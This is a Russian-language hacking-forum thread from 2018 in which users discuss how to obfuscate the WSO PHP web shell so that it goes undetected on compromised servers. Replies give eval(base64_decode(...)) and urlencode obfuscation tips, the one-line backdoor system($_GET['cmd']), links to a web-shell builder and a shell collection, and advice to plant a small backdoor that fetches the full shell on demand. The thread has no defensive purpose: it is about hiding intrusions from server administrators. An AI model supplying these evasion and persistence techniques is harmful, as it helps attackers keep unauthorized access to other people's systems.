HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 23.09.2018, 08:54
Photocam
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

знаю что тема ахулиард раз опсуждалась. Но там уже все сервисы подохли и да не надо подсказывать очевидные вещи что надо шифровать только приватными или самописными методами

Плиз посоветуйте чем зашифровать всо бесплатно

Только много из того что жило год назад уже не живет как сервис fopo. Такое не надо советовать

Могу на пиво еще закинуть за годный совет)
 
Ответить с цитированием

  #2  
Старый 23.09.2018, 08:56
Тот_самый_Щуп
Guest
Сообщений: n/a
Провел на форуме:
47768

Репутация: 119
По умолчанию

eval(base64_decode('код шелла в базе64'));

можно ещё gzdeflate добавить для усложнения.

Пользуйся, благодарностей не надо. Я за идею.
 
Ответить с цитированием

  #3  
Старый 23.09.2018, 09:01
Photocam
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

Интеллект не пропьешь) это же палится легко
 
Ответить с цитированием

  #4  
Старый 23.09.2018, 10:36
Тот_самый_Щуп
Guest
Сообщений: n/a
Провел на форуме:
47768

Репутация: 119
По умолчанию

Вместо base64 можно использовать urlencode например, это в корне поменяет дело
 
Ответить с цитированием

  #5  
Старый 23.09.2018, 10:41
Photocam
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от Gorbachev  
Gorbachev said:

Вместо base64 можно использовать urlencode например, это в корне поменяет дело
на пиво куда закидывать?
 
Ответить с цитированием

  #6  
Старый 23.09.2018, 16:30
panic.ker
Guest
Сообщений: n/a
Провел на форуме:
35643

Репутация: 3
По умолчанию

Собственно тот же вопрос интересует,чтоб по быстрому это делать онлайн, особенно когда в силу обстоятельств и передвижений нет инструментов под рукой.

Юзал раньше http://kronus.me/cn/wso-builder/1.04/ , но сильно уж палится.

ТС, если не ограничиваться всо, посмотри вот тут еще

https://github.com/tennc/webshell/tree/master/

Полнее пока не встречал сборку шеллов, на asp,aspx,php,jsp,pl,py

Иногда (не часто) апдейтятся, есть обфусцированные, возможно найдешь не палящиеся (проверяй на бэкдоры естественно)
 
Ответить с цитированием

  #7  
Старый 23.09.2018, 17:18
Photocam
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от panic.ker  
panic.ker said:

Собственно тот же вопрос интересует,чтоб по быстрому это делать онлайн, особенно когда в силу обстоятельств и передвижений нет инструментов под рукой.
Юзал раньше
http://kronus.me/cn/wso-builder/1.04/
, но сильно уж палится.
ТС, если не ограничиваться всо, посмотри вот тут еще
https://github.com/tennc/webshell/tree/master/
Полнее пока не встречал сборку шеллов, на asp,aspx,php,jsp,pl,py
Иногда (не часто) апдейтятся, есть обфусцированные, возможно найдешь не палящиеся (проверяй на бэкдоры естественно)
Ну а так ты там встречал бекдоры??
 
Ответить с цитированием

  #8  
Старый 23.09.2018, 17:45
panic.ker
Guest
Сообщений: n/a
Провел на форуме:
35643

Репутация: 3
По умолчанию

Мне пока $_GET['cmd'] / system($_GET['cmd']) хватает вполне =) Самый надежный вариант.

Оттуда не юзал еще, т.к. ссылку только вчера обнаружил. Но отрицательных отзывов не видел, парни юзают.

Все же проверять самому советую.
 
Ответить с цитированием

  #9  
Старый 23.09.2018, 19:50
dmax0fw
Guest
Сообщений: n/a
Провел на форуме:
20361

Репутация: 46
По умолчанию

Цитата:
Сообщение от panic.ker  
panic.ker said:

system($_GET['cmd']) хватает вполне =) Самый надежный вариант.
и как только админ занесёт system() в disable_functions самый надёжный вариант превратится в самый нерабочий

Цитата:
Сообщение от Photocam  
Photocam said:

Плиз посоветуйте чем зашифровать всо бесплатно
не нужно его ничем шифровать, его не нужно даже хранить на сервере вовсе

на сервере должен быть маленький бекдор, который по щелчку пальца заливает полноценный wso для работы
 
Ответить с цитированием

  #10  
Старый 23.09.2018, 21:18
panic.ker
Guest
Сообщений: n/a
Провел на форуме:
35643

Репутация: 3
По умолчанию

Цитата:
Сообщение от dmax0fw  
dmax0fw said:

и как только админ занесёт system() в disable_functions самый надёжный вариант превратится в самый нерабочий
К этому моменту шелл обычно уже не требуется =) Не те задачи, тем более для долгосрочного доступа. Да и в принципе,твоя фраза "как только админ..." -если админ грамотный, то применимо ко всем вариантам, уже ничего и не поможет.Там "как только админ"-так сразу. Тем более "как только админ" дупля отобьет, я уже закреплен (образно)))) в системе, дедовскими методами-но все же (не везде отрабатывает ведь). А бэкдор "заливающий шелл" - это уже заливающий шел, т.е. ПАЛИВНЫЙ ШЕЛЛ, неважно куки ты используешь для доступа, токены, бд, а если кроссдоменные обращения тоже запрещены? каждый раз изьебоваться будешь? Можешь подробнее, просто не совсем область моя, я хотел бы узнать подробнее, что ты имеешь ввиду. Или админ шелл твой (зная что взломали уже) в логах или /тмп или исходниках не заметит? Он прошерстит всё. Тут вопрос про обфускацию, т.е. по факту про не паливность залитого (eval то он тоже спалит). Предложи, вот в чем вопрос. Иначе можно опять все свести к теме "как залить" а потом к теме "как спрятать". Вопрос про быструю непалевную обфускацию по идее.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ